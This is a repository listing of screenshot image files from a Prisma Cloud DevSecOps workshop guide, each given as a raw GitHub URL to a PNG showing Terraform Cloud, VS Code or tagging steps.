--------------------------------------------------------------------------------
/guide/images/tfc-create-token.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-create-token.png


--------------------------------------------------------------------------------
/guide/images/tfc-org-details.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-org-details.png


--------------------------------------------------------------------------------
/guide/images/tfc-plan-running.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-plan-running.png


--------------------------------------------------------------------------------
/guide/images/tfc-post-plan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-post-plan.png


--------------------------------------------------------------------------------
/guide/images/tfc-pr-fix.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-pr-fix.png


--------------------------------------------------------------------------------
/guide/images/tfc-run-queued.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-run-queued.png


--------------------------------------------------------------------------------
/guide/images/tfc-run-task-created.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-run-task-created.png


--------------------------------------------------------------------------------
/guide/images/tfc-token-created.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-token-created.png


--------------------------------------------------------------------------------
/guide/images/tfc-vars1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-vars1.png


--------------------------------------------------------------------------------
/guide/images/tfc-vars2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-vars2.png


--------------------------------------------------------------------------------
/guide/images/tfc-vcs-workflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-vcs-workflow.png


--------------------------------------------------------------------------------
/guide/images/tfc-welcome.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-welcome.png


--------------------------------------------------------------------------------
/guide/images/tfc-workspace-created.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-workspace-created.png


--------------------------------------------------------------------------------
/guide/images/tfc-workspace1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-workspace1.png


--------------------------------------------------------------------------------
/guide/images/tfc-workspace2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-workspace2.png


--------------------------------------------------------------------------------
/guide/images/tfc-workspace3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-workspace3.png


--------------------------------------------------------------------------------
/guide/images/vscode-extension.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/vscode-extension.png


--------------------------------------------------------------------------------
/guide/images/vscode-ide1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/vscode-ide1.png


--------------------------------------------------------------------------------
/guide/images/vscode-ide2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/vscode-ide2.png


--------------------------------------------------------------------------------
/guide/images/workshop-flow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/workshop-flow.png


--------------------------------------------------------------------------------
/guide/images/yor-tags.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/yor-tags.png


--------------------------------------------------------------------------------